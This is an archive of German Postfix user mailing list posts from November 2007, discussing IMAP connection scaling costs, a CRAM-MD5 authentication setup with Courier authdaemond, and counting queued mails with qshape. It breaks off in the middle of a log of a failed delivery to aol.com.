driessen at fblan.de Tue Nov 20 23:24:17 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 20 Nov 2007 23:24:17 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <200711202214.01617.p.heinlein@heinlein-support.de> References: <474311A9.5020600@puersten.de><7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com><4743337C.3010700@thomas-schwenski.de> <200711202214.01617.p.heinlein@heinlein-support.de> Message-ID: <001f01c82bc4$16f8fd20$0565a8c0@uwe> Peer Heinlein schrieb: > 40 Servern werden 80. Und dann dann würden aus 15 nur 30 werden. Man > solte ja auch an die Zukunft denken. Und Server brauchen Strom. Und > Kühlung. Und Ersatzteile. mal den Gedanken mit ein paar zahlen spickt*gg 1 Server P3 dual mit 3GB Ram 6 Platten SCSI Raid5 = ca. 400 Watt Leitungsaufnahme sind im Jahr ca. 760 ? Stromkosten P4 Quad mit 32 GB Ram und 30 Platten ca. 2000 Watt im Mittel. bei 30 Server kommen dann nochmal gut und gerne 35 -40 KW Kühlleistung dazu.(sollte man mal über Wärmerückgewinnung nachdenken) das sind dann 100KW Anschlußleistung wenn ich mich nicht verrechnet habe. sind dann so in etwa 182.000,-- ? Stromkosten im Jahr(Gewerbe war aber glaube ich noch ein bischen teurer) Also wenn Peer mit einem kleineren Modell zufrieden ist (alleine der Umwelt zuliebe *gg) kann er davon jedes Jahr einen neuen fahren. Da ist noch nicht eingerechnet was an Hardware gespart wird. Mit der Ersparniss kann man alleine alle 3 Jahre die komplette Hardware tauschen und hat immer noch Geld gespart. > > 50 Server Unterschied sind hier auf 5 Jahre eine RIESIGE Menge > Unterschied. Achwas, das sind mehr als zwei BMW oder nur eine > Admin-Stelle. > > Peer summa sumarum ist das mehr wie ein großer Unterschied ob 15 oder 50 Server für die gleiche Aufgabe benötigt werden selbst wenn die Programmierung 100.000 ? verschlingen würde. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From postfixbuch-users at japantest.homelinux.com Wed Nov 21 00:02:00 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 21 Nov 2007 00:02:00 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <001f01c82bc4$16f8fd20$0565a8c0@uwe> References: <474311A9.5020600@puersten.de><7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com><4743337C.3010700@thomas-schwenski.de> <200711202214.01617.p.heinlein@heinlein-support.de> <001f01c82bc4$16f8fd20$0565a8c0@uwe> Message-ID: <47436768.3070402@japantest.homelinux.com> Uwe Driessen wrote: > Peer Heinlein schrieb: >> 40 Servern werden 80. Und dann dann würden aus 15 nur 30 werden. Man >> solte ja auch an die Zukunft denken. Und Server brauchen Strom. Und >> Kühlung. Und Ersatzteile. > > mal den Gedanken mit ein paar zahlen spickt*gg > > 1 Server P3 dual mit 3GB Ram 6 Platten SCSI Raid5 = ca. 400 Watt Leitungsaufnahme > > sind im Jahr ca. 760 ? Stromkosten > > P4 Quad mit 32 GB Ram und 30 Platten ca. 2000 Watt im Mittel. Nein, die Rechnung is maßlos übertrieben. Unser VMWare-Server mit 2 Quadcores, 12 GB RAM und 6 SAS-Platten schluckt im Durchschnitt etwa 250 Watt. Das ist schließlich ein PC und keine Büroheizung. Aber der Rest stimmt schon, jeder PC kostet Arbeitszeit durch Wartung und Konfiguration, steht hinter einer USV, muss gekühlt werden und im Backup aufgenommen sein. Bei solchen Größenordnungen gehe ich ohnehin davon aus, dass ein SAN als Backend den Plattenplatz zur Verfügung stellt und die Server wenn möglich direkt vom SAN gebootet werden. Altern tut Hardware auch, deshalb wundert mich die Entscheidung auch etwas. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From postfix-buch.ml at michawinter.de Wed Nov 21 00:12:13 2007 From: postfix-buch.ml at michawinter.de (Michael Winter) Date: Wed, 21 Nov 2007 00:12:13 +0100 Subject: [Postfixbuch-users] CRAM-MD5-Authentifizierung bei authdaemond klappt nicht Message-ID: <474369CD.60401@michawinter.de> Hallo zusammen, wahrscheinlich eine Anfängerfrage, aber Anfänger bin ich ja auch: Courier und Postfix installliert. Courier realisiert Authentifizierung über authdaemond und MySQL, in der DB steht das Passwort als Klartext (hier: User=dummy, Pass=dummy). Anmeldung mit CRAM-MD5 funktioniert: capa +OK Here's what I can do: SASL CRAM-MD5 CRAM-SHA1 CRAM-SHA256 STLS TOP USER LOGIN-DELAY 10 PIPELINING UIDL IMPLEMENTATION Courier Mail Server . AUTH CRAM-MD5 + PDFBM0ZFMDEwNUUwRDQwRUJCQTc5RjRBRjRDMjdDRDhBQG5vdGlmaXg+ ZHVtbXkgYWZlZjIwYTk0ZGE2NWJkNTk4M2U1NTM2NjNmMzQzNWM= +OK logged in. Fein. Nun soll Postfix auch authdaemond benutzen. Dazu steht in /etc/postfix/sasl/smtpd.conf: pwcheck_method: authdaemond log_level: 3 mech_list: PLAIN LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 authdaemond_path: /var/run/courier/authdaemon/socket Unverschlüsseltes Login geht damit auch, die Verbindung mit dem authdaemond scheint also zu funktionieren: ehlo foo ... 250-AUTH PLAIN LOGIN CRAM-MD5 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN AUTH PLAIN AGR1bW15AGR1bW15 235 2.0.0 Authentication successful wohingegen CRAM-MD5 scheitert: AUTH CRAM-MD5 334 PDI0NzYyMTE5NzkuNDQxNzQ0NkBub3RpZml4Pg== ZHVtbXkgZDhkNThhZTMxMmMwOThmMzgzNTJjYzRkNDg1MGVlMjA= 535 5.7.0 Error: authentication failed: authentication failure Das Logfile an dieser Stelle verstehe ich nicht. Nov 21 00:02:36 notifix postfix/smtpd[9150]: connect from localhost[127.0.0.1] Nov 21 00:03:19 notifix postfix/smtpd[9150]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: No such file or directory Nov 21 00:03:19 notifix postfix/smtpd[9150]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: No such file or directory Nov 21 00:03:19 notifix postfix/smtpd[9150]: warning: SASL authentication failure: no secret in database Nov 21 00:03:19 notifix postfix/smtpd[9150]: warning: localhost[127.0.0.1]: SASL CRAM-MD5 authentication failed: authentication failure Ist Postix der Meinung, ich würde saslauth benutzen? Warum? Was mache ich falsch? (BTW, die Frage, warum Courier trotz ausdrücklichem POP3AUTH="CRAM-MD5 CRAM-SHA1 CRAM-SHA256" POP3AUTH_TLS="PLAIN LOGIN" sowohl PLAIN als auch LOGIN als auch USER/PASS ohne STLS zulässt plagt mich auch noch. Aber das steht ja schon in der Liste nebenan.) Danke für jede Hilfe. -Michael From ml at awinkelmann.de Wed Nov 21 06:30:48 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Wed, 21 Nov 2007 06:30:48 +0100 Subject: [Postfixbuch-users] CRAM-MD5-Authentifizierung bei authdaemond klappt nicht In-Reply-To: <474369CD.60401@michawinter.de> References: <474369CD.60401@michawinter.de> Message-ID: <200711210630.48950.ml@awinkelmann.de> On Mittwoch, 21. November 2007, Michael Winter wrote: > Courier und Postfix installliert. Courier realisiert Authentifizierung > über authdaemond und MySQL, in der DB steht das Passwort als Klartext > (hier: User=dummy, Pass=dummy). Anmeldung mit CRAM-MD5 funktioniert: > Nun soll Postfix auch authdaemond benutzen. Dazu steht in > /etc/postfix/sasl/smtpd.conf: > > pwcheck_method: authdaemond > log_level: 3 > mech_list: PLAIN LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 > authdaemond_path: /var/run/courier/authdaemon/socket Bei Cyrus-SASL funktioniert bei Verwendung von saslauthd oder authdaemond nur PLAIN oder LOGIN. Alle *-MD5 Mechanismen funktionieren nur mit auxprop (und Passwörtern im Klartext). pwcheck_method: authdaemond saslauthd mech_list: plain login Das ist sicher schon hunderte male durch alle Listen gegangen. -- Andreas From nospam at thoma.cc Wed Nov 21 08:49:02 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Wed, 21 Nov 2007 08:49:02 +0100 Subject: [Postfixbuch-users] Postfix / Courier softqouta mysql In-Reply-To: <474319F1.1090203@thomas-schwenski.de> References: <4742BEFD.4060405@thoma.cc> <474319F1.1090203@thomas-schwenski.de> Message-ID: <4743E2EE.2050301@thoma.cc> Hallo Thomas, ich habe gerade einen Policy Deamon in PHP zusammengebastelt der den Quota checken kann. Ich habe leider gerade keine VM mit einem VMail System zur Hand und kann es deshalb nicht testen aber wenn es dich Interessiert kannst du das Script von meinem Server laden. Aber ohne Garantie das es vollständig funktioniert und keine Fehler hat !!!! Also nicht auf einem produktiv System testen !!! http://mirror.thoma.cc/postfix/pqpd/pqpd.txt Gruß Maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma PGP: http://mirror.thoma.cc/pgp/0x6AC4976A.asc Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From marc.samendinger at sp-online.de Wed Nov 21 09:33:12 2007 From: marc.samendinger at sp-online.de (Marc Samendinger) Date: Wed, 21 Nov 2007 09:33:12 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <47436768.3070402@japantest.homelinux.com> References: <200711202214.01617.p.heinlein@heinlein-support.de> <001f01c82bc4$16f8fd20$0565a8c0@uwe> <47436768.3070402@japantest.homelinux.com> Message-ID: <20071121083312.GA26946@barracuda.sp-online.de> On Wed, Nov 21, 2007 at 12:02:00AM +0100, Sandy Drobic wrote: > > Aber der Rest stimmt schon, jeder PC kostet Arbeitszeit durch Wartung und > Konfiguration, steht hinter einer USV, muss gekühlt werden und im Backup > aufgenommen sein. Bei solchen Größenordnungen gehe ich ohnehin davon aus, > dass ein SAN als Backend den Plattenplatz zur Verfügung stellt und die > Server wenn möglich direkt vom SAN gebootet werden. > > Altern tut Hardware auch, deshalb wundert mich die Entscheidung auch etwas. Ja? Meine Erfahrung ist, dass in Hardware einfach mehr vertraut wird. Hardware ist greifbar, Hardware geht zwar mal kaputt aber kann dann getauscht werden. Software ist da viel undurchsichtiger für den Kunden wenn es ein Software Problem gibt muss erst lang gesucht werden und der Kunde versteht gar nicht was da gerade gemacht wird. Software stürzt oft ab oder verhält sich komisch... Ich verallgemeinere ganz bewusst. > Sandy Gruß Marc From postfixbuch at thomas-schwenski.de Wed Nov 21 10:24:48 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Wed, 21 Nov 2007 10:24:48 +0100 Subject: [Postfixbuch-users] Postfix / Courier softqouta mysql In-Reply-To: <4743E2EE.2050301@thoma.cc> References: <4742BEFD.4060405@thoma.cc> <474319F1.1090203@thomas-schwenski.de> <4743E2EE.2050301@thoma.cc> Message-ID: <4743F960.5060605@thomas-schwenski.de> Ich hols mir mal und schau es mir im Verlauf der nächsten Woche mal an. Momentan muss ich selbst noch schnell einen kompletten Mailserver in eine VM stricken und mir läuft die Zeit etwas davon. Prinzipiell ist es nicht schwer, das Ganze umzusetzen, wobei ich eher zu Perl als PHP gegriffen hätte. Ich weiß, dass meine Meinung nicht wirklich fundiert ist, aber ich habe den Eindruck, dass mit Perl nicht nur mehr machbar ist, sondern dass es auch weniger Ressourcen verbrauchen dürfte. Ich geb' Dir nächste Woche mal meinen Senf dazu. Halt mich über Verbesserungen mal auf dem laufenden. Thomas Maximilian Thoma schrieb: > > Hallo Thomas, > > ich habe gerade einen Policy Deamon in PHP zusammengebastelt der den > Quota checken kann. Ich habe leider gerade keine VM mit einem VMail > System zur Hand und kann es deshalb nicht testen aber wenn es dich > Interessiert kannst du das Script von meinem Server laden. Aber ohne > Garantie das es vollständig funktioniert und keine Fehler hat !!!! Also > nicht auf einem produktiv System testen !!! > > http://mirror.thoma.cc/postfix/pqpd/pqpd.txt > > Gruß > > > Maximilian > > From postfixbuch at thomas-schwenski.de Wed Nov 21 10:35:49 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Wed, 21 Nov 2007 10:35:49 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <200711202214.01617.p.heinlein@heinlein-support.de> References: <474311A9.5020600@puersten.de> <7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com> <4743337C.3010700@thomas-schwenski.de> <200711202214.01617.p.heinlein@heinlein-support.de> Message-ID: <4743FBF5.3030302@thomas-schwenski.de> Hallo Peer, mal abweichend eine Frage: Gibt es irgendwo eine "offizielle" Dokumentation oder einen Test, der den von Dir angegebenen 1MB pro IMAP-Connection dokumentiert? Oder ist das nur ein Erfahrungswert? Nicht dass ich Deinem Urteil kein Gewicht gebe, ich brauche bloß für eine Dokumentation eine Quellenangabe. Andererseits kann ich mir nicht vorstellen, wofür Courier den MB verbrät. Da könnte doch bestimmt noch optimiert werden oder? Habt Ihr da vielleicht schon mal einen Blick auf den Quelltext geworfen? Das wäre doch auch noch ein Ansatzpunkt für "Sparmaßnahmen". Gruß Thomas Peer Heinlein schrieb: > Am Dienstag, 20. November 2007 schrieb Thomas Schwenski: > > >> 1. Oliver sucht etwas ähnliches wie Peer _irgendwann_mal_ suchte. > > Wie Peer nach wie vor ständig baut und eigentlich immernoch einen > Auftraggeber sucht, der sowas lieber intelligent als durch Hardware > löst. :-) > >> ... > > Es ist lösbar, dazu ja dieser Spezial-Proxy. Sozusagen exakt das Gegenteil > von up-imapproxy, der solche Verbindungen offenhält. :-) > >> ... > > Daß es nicht darum geht, Zugriffe auf die Server zu verteilen. DAS ist > banal. Egal welche Form von Loadbalancer -- das ist nicht der Akt. > > Das Problem ist, daß 80.000 User nach wie vor 80.000 IMAP-Sitzungen offen > halten. Egal wie Du es auf die Server verteilst -- der RAM-Verbrauch ist > da. > > Das von mir skiziierte Proxy-System würde den RAM-Verbrauch an sich > drastisch minimieren, so daß brutal Hardware eingespart werden kann. Mit > der Verteilung auf die Nodes hat das wenig zu tun. Loadbalancer brauchst > Du in der Größenordnung zur Sicherstellung der HA sowieso. > >> ... > > Tja, man kann auch 15 Server einsetzen und damit zwei flotte BMW sparen > (oder einfach mal zur Abwechslung jemanden einstellen, anstatt das Geld > in Fernost-Hardware zu stecken). Zu bedenken ist auch: Sowas wächst. Aus > 40 Servern werden 80. Und dann dann würden aus 15 nur 30 werden. Man > solte ja auch an die Zukunft denken. Und Server brauchen Strom. Und > Kühlung. Und Ersatzteile. > > 50 Server Unterschied sind hier auf 5 Jahre eine RIESIGE Menge > Unterschied. Achwas, das sind mehr als zwei BMW oder nur eine > Admin-Stelle. > >> ... > > Den Auftraggeber kann ich nicht nennen. Weder das damalige, noch das > aktuelle Projekt. > > Ausgegangen ist es dahin, daß damals die Entscheidung in Hardware fiel, > beim aktuellen Projekt ist das noch nicht thematisiert. > > Peer From mluser at rbmail.ch Wed Nov 21 12:19:52 2007 From: mluser at rbmail.ch (Andre Keller) Date: Wed, 21 Nov 2007 12:19:52 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections In-Reply-To: <4743FBF5.3030302@thomas-schwenski.de> References: <474311A9.5020600@puersten.de> <7832fd560711201017j11c62b87r9cab38257fdb201e@mail.gmail.com> <4743337C.3010700@thomas-schwenski.de> <200711202214.01617.p.heinlein@heinlein-support.de> <4743FBF5.3030302@thomas-schwenski.de> Message-ID: <47441458.4050204@rbmail.ch> > Andererseits kann ich mir nicht vorstellen, wofür Courier den MB > verbrät. Da könnte doch bestimmt noch optimiert werden oder? > Habt Ihr da vielleicht schon mal einen Blick auf den Quelltext geworfen? > Das wäre doch auch noch ein Ansatzpunkt für "Sparmaßnahmen". Dovecot scheint da sparsamer zu sein: "Dovecot takes very little memory. Most of it goes to mmap()ed index and mailbox files, meaning that if operating system is low on memory, it can simply drop those memory pages without having to store them in swap. Connections are handled in separate processes, each one currently using around 100kB of swappable memory. Some extensions like SORT and THREAD will require more memory to work though." http://wiki.dovecot.org/DovecotFeatures Gruss André From mrg at unimx.de Wed Nov 21 14:11:55 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Wed, 21 Nov 2007 14:11:55 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues / viele warten in active Message-ID: <086601c82c40$2ac8c930$805a5b90$@de> Hallo Gruppe, schnelle und einfache Frage: Wie kann ich mir schnell die Anzahl der Mails in den einzelnen Postfix Queues anschauen? mailq ist zu ungenau, zeigt nur Gesamtmails an auch nur mit |grep Req (da sonst zuviel Ausgabe) Noch etwas: Bei mir hängen recht viele Mails in active und warten auf amavisd-new In den amavisd.logs stehen Zeiten im Schnitt: queued as: NNNNNNNNNN, 10000ms Dauern die DNS anfragen so lange? Kann ich mir die genauen Timings anzeigen lassen (jedes Modul von amavisd)? [Auch bei log_level auf 2 zeigt mit das Log keine genauen Angaben über die timings. Auch nicht log_level 4 Bekomme einfach keine genauen Timing Infos] Kann es an irgendwelchen Listen liegen die angefragt werden aber nicht mehr existieren? Konfiguration: - Markierlevel kommen aus DB (eigener DB-Server im lokalen Netz) - cpu bei ca 30% - load (15 min schnitt) bei 3 (vermutlich durch I/O) - bypass virus scan Im Spamassassin (local.cf) habe ich folgendes eingetragen: use_razor2 0 use_pyzor 0 use_dcc 0 skip_rbl_checks 0 rbl_timeout 2 Versionen: neuste amavisd-new Snap Postfix: Spamassassin: Module Mail::SpamAssassin 3.001005 Module Net::DNS 0.48 Module DBD::mysql 2.0419 Module DBI 1.52 Perl version 5.008 Danke Martin -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From postfixusers at home.tom-krieger.de Wed Nov 21 14:19:34 2007 From: postfixusers at home.tom-krieger.de (Thomas Krieger) Date: Wed, 21 Nov 2007 14:19:34 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues / viele warten in active In-Reply-To: <086601c82c40$2ac8c930$805a5b90$@de> References: <086601c82c40$2ac8c930$805a5b90$@de> Message-ID: <200711211419.36497.postfixusers@home.tom-krieger.de> Servus, Am Mi November 21 2007 schrieb mrg at unimx.de: > > schnelle und einfache Frage: > > > > Wie kann ich mir schnell die Anzahl der Mails in den einzelnen Postfix > Queues anschauen? > > > > mailq ist zu ungenau, zeigt nur Gesamtmails an auch nur mit |grep Req (da > sonst zuviel Ausgabe) watch --interval=5 "find /var/spool/postfix/active -type f | wc -l" das gibt Dir alle 5 Sek. die Anzahl der Mails im Verzeichnis der active Queue aus. Ggf. musst Du das an Deine Gegebenheiten anpassen. Servus Thomas From Ralf.Hildebrandt at charite.de Wed Nov 21 14:20:34 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 21 Nov 2007 14:20:34 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues / viele warten in active In-Reply-To: <086601c82c40$2ac8c930$805a5b90$@de> References: <086601c82c40$2ac8c930$805a5b90$@de> Message-ID: <20071121132034.GD1981@charite.de> * mrg at unimx.de : > Wie kann ich mir schnell die Anzahl der Mails in den einzelnen Postfix > Queues anschauen? qshape > Bei mir hängen recht viele Mails in active und warten auf amavisd-new > > In den amavisd.logs stehen Zeiten im Schnitt: queued as: NNNNNNNNNN, 10000ms > > > > Dauern die DNS anfragen so lange? Kann sein. dazu müsstest Du das Logging von amavisd-new hochdrehen > [Auch bei log_level auf 2 zeigt mit das Log keine genauen Angaben über die > timings. Auch nicht log_level 4 Notfalls amavis im sa-debug mode laufen lassen: amavisd-new sa-debug -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Sysadmins don't go to hell; we're already doing our time in purgatory. From Ralf.Hildebrandt at charite.de Wed Nov 21 14:20:55 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 21 Nov 2007 14:20:55 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues / viele warten in active In-Reply-To: <200711211419.36497.postfixusers@home.tom-krieger.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <200711211419.36497.postfixusers@home.tom-krieger.de> Message-ID: <20071121132055.GE1981@charite.de> * Thomas Krieger : > watch --interval=5 "find /var/spool/postfix/active -type f | wc -l" watch --interval=5 qshape active -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de I never think of the future. It comes soon enough. - Albert Einstein From postfixusers at home.tom-krieger.de Wed Nov 21 14:24:38 2007 From: postfixusers at home.tom-krieger.de (Thomas Krieger) Date: Wed, 21 Nov 2007 14:24:38 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Anzahl_von_Mails_in_den_Postfi?= =?iso-8859-1?q?x_queues_/=09viele_warten_in_active?= In-Reply-To: <20071121132055.GE1981@charite.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <200711211419.36497.postfixusers@home.tom-krieger.de> <20071121132055.GE1981@charite.de> Message-ID: <200711211424.39310.postfixusers@home.tom-krieger.de> Am Mi November 21 2007 schrieb Ralf Hildebrandt: > * Thomas Krieger : > > watch --interval=5 "find /var/spool/postfix/active -type f | wc -l" > > watch --interval=5 qshape active richtig, wenn qshape installiert ist Servus Thomas From Ralf.Hildebrandt at charite.de Wed Nov 21 14:32:42 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 21 Nov 2007 14:32:42 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues /?viele warten in active In-Reply-To: <200711211424.39310.postfixusers@home.tom-krieger.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <200711211419.36497.postfixusers@home.tom-krieger.de> <20071121132055.GE1981@charite.de> <200711211424.39310.postfixusers@home.tom-krieger.de> Message-ID: <20071121133242.GF1981@charite.de> * Thomas Krieger : > Am Mi November 21 2007 schrieb Ralf Hildebrandt: > > * Thomas Krieger : > > > watch --interval=5 "find /var/spool/postfix/active -type f | wc -l" > > > > watch --interval=5 qshape active > > richtig, wenn qshape installiert ist Das gehört doch zu Postfix dazu! -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Microsoft DNS service terminates abnormally when it receives a response to a dns query that was never made. Fix information: run your DNS service on a different platform. -- bugtraq From Ralf.Hildebrandt at charite.de Wed Nov 21 15:19:47 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 21 Nov 2007 15:19:47 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues /?viele warten in active In-Reply-To: <20071121133242.GF1981@charite.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <200711211419.36497.postfixusers@home.tom-krieger.de> <20071121132055.GE1981@charite.de> <200711211424.39310.postfixusers@home.tom-krieger.de> <20071121133242.GF1981@charite.de> Message-ID: <20071121141947.GJ1981@charite.de> * Ralf Hildebrandt : > * Thomas Krieger : > > Am Mi November 21 2007 schrieb Ralf Hildebrandt: > > > * Thomas Krieger : > > > > watch --interval=5 "find /var/spool/postfix/active -type f | wc -l" > > > > > > watch --interval=5 qshape active > > > > richtig, wenn qshape installiert ist > > Das gehört doch zu Postfix dazu! Jedenfalls seit MINDESTENS 2 Jahren... 20051109 qshape.pl updated for extra microsecond time field in Postfix queue files. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de From mrg at unimx.de Wed Nov 21 15:25:12 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Wed, 21 Nov 2007 15:25:12 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues / viele warten in active In-Reply-To: <200711211424.39310.postfixusers@home.tom-krieger.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <200711211419.36497.postfixusers@home.tom-krieger.de> <20071121132055.GE1981@charite.de> <200711211424.39310.postfixusers@home.tom-krieger.de> Message-ID: <088501c82c4a$68540d00$38fc2700$@de> >> * Thomas Krieger : >> > watch --interval=5 "find /var/spool/postfix/active -type f | wc -l" >> >> watch --interval=5 qshape active > >richtig, wenn qshape installiert ist Super danke genau das wollte ich. Noch eine Frage. Im mailq steht ca 1700 Reqs aber in den queues hängen nur ca. 1000 Es tragen viele Mails mit mailq ein Sternchen (*NNNNNNNN). Wie kann ich die mit * zählen? mailq |grep "*" |wc -l dauert eine Ewigkeit. Was bedeutet dies? Dass die Mail noch nicht verarbeitet ist und Postfix die Mail auch noch nicht "gequeued" hat? Danke vielmals Martin PS: Tolle Gruppe! From Ralf.Hildebrandt at charite.de Wed Nov 21 15:49:11 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 21 Nov 2007 15:49:11 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues / viele warten in active In-Reply-To: <088501c82c4a$68540d00$38fc2700$@de> References: <086601c82c40$2ac8c930$805a5b90$@de> <200711211419.36497.postfixusers@home.tom-krieger.de> <20071121132055.GE1981@charite.de> <200711211424.39310.postfixusers@home.tom-krieger.de> <088501c82c4a$68540d00$38fc2700$@de> Message-ID: <20071121144911.GL1981@charite.de> * mrg at unimx.de : > Noch eine Frage. Im mailq steht ca 1700 Reqs aber in den queues hängen nur > ca. 1000 > > Es tragen viele Mails mit mailq ein Sternchen (*NNNNNNNN). > Wie kann ich die mit * zählen? mailq |grep "*" |wc -l dauert eine Ewigkeit. Die mit stern sind "active": qshape active -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Dirty hack? Did someone call my name? From crandler at crandland.de Wed Nov 21 16:05:42 2007 From: crandler at crandland.de (crandler) Date: Wed, 21 Nov 2007 16:05:42 +0100 Subject: [Postfixbuch-users] Anzahl von Mails in den Postfix queues / vielewarten in active In-Reply-To: <086601c82c40$2ac8c930$805a5b90$@de> Message-ID: <00e301c82c4f$fc948710$2200a8c0@netclusive.local> > Wie kann ich mir schnell die Anzahl der Mails in den einzelnen Postfix > Queues anschauen? Für 'active' z. B.: qshape active oder: find /var/spool/postfix/active -type f -print | wc -l From anmeyer at anup.de Wed Nov 21 20:07:59 2007 From: anmeyer at anup.de (Andreas Meyer) Date: Wed, 21 Nov 2007 20:07:59 +0100 Subject: [Postfixbuch-users] aol.com connection Problem Message-ID: <20071121200759.7f4d5673@gamma.meyer.home> Hallo! Kann mir jemand auf die Sprünge helfen. Ich kann keine mail an einen Teilnehmer von aol.com zustellen. Nov 21 18:48:01 cherry postfix/smtpd[12725]: connect from delta.anup.dmz[192.168.20.60] Nov 21 18:48:01 cherry postfix/smtpd[12725]: setting up TLS connection from delta.anup.dmz[192.168.20.60] Nov 21 18:48:02 cherry postfix/smtpd[12725]: fingerprint=8F:AF:F4:A9:19:67:89:5C:79:37:FD:45:C0:76:EA:4A Nov 21 18:48:02 cherry postfix/smtpd[12725]: Verified: subject_CN=delta.anup.dmz, issuer=CA-anup.de Nov 21 18:48:02 cherry postfix/smtpd[12725]: TLS connection established from delta.anup.dmz[192.168.20.60]: TL Sv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits) Nov 21 18:48:02 cherry postfix/smtpd[12725]: 97EA082E6: client=delta.anup.dmz[192.168.20.60] Nov 21 18:48:02 cherry postfix/cleanup[12729]: 97EA082E6: message-id=<20071121174742.A200C17908D at delta.anup.dm z> Nov 21 18:48:02 cherry postfix/qmgr[6978]: 97EA082E6: from=, size=1574, nrcpt=1 (queue acti ve) Nov 21 18:48:02 cherry postfix/smtpd[12725]: disconnect from delta.anup.dmz[192.168.20.60] Nov 21 18:48:08 cherry postfix/smtp[12730]: 97EA082E6: lost connection with mailin-02.mx.aol.com[64.12.137.168 ] while receiving the initial server greeting Nov 21 18:48:09 cherry postfix/smtp[12730]: 97EA082E6: to=, relay=mailin-03.mx.aol.com[64.12. 138.153]:25, delay=7.5, delays=0.14/0.13/6.1/1.1, dsn=2.0.0, status=sent (250 OK) Nov 21 18:48:09 cherry postfix/qmgr[6978]: 97EA082E6: removed Nov 21 18:51:23 cherry postfix/smtpd[12775]: connect from delta.anup.dmz[192.168.20.60] Nov 21 18:51:23 cherry postfix/smtpd[12775]: setting up TLS connection from delta.anup.dmz[192.168.20.60] Nov 21 18:51:23 cherry postfix/smtpd[12775]: fingerprint=8F:AF:F4:A9:19:67:89:5C:79:37:FD:45:C0:76:EA:4A Nov 21 18:51:23 cherry postfix/smtpd[12775]: Verified: subject_CN=delta.anup.dmz, issuer=CA-anup.de Nov 21 18:51:23 cherry postfix/smtpd[12775]: TLS connection established from delta.anup.dmz[192.168.20.60]: TL Sv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits) Nov 21 18:51:23 cherry postfix/smtpd[12775]: 5871082E6: client=delta.anup.dmz[192.168.20.60] Nov 21 18:51:23 cherry postfix/cleanup[12778]: 5871082E6: message-id=<20071121175105.D8D6D17908D at delta.anup.dm z> Nov 21 18:51:23 cherry postfix/qmgr[6978]: 5871082E6: from=, size=3520, nrcpt=1 (queue acti ve) Nov 21 18:51:23 cherry postfix/smtpd[12775]: disconnect from delta.anup.dmz[192.168.20.60] Nov 21 18:51:23 cherry postfix/smtp[12779]: 5871082E6: to=, relay=none, delay=0.32, delays=0. 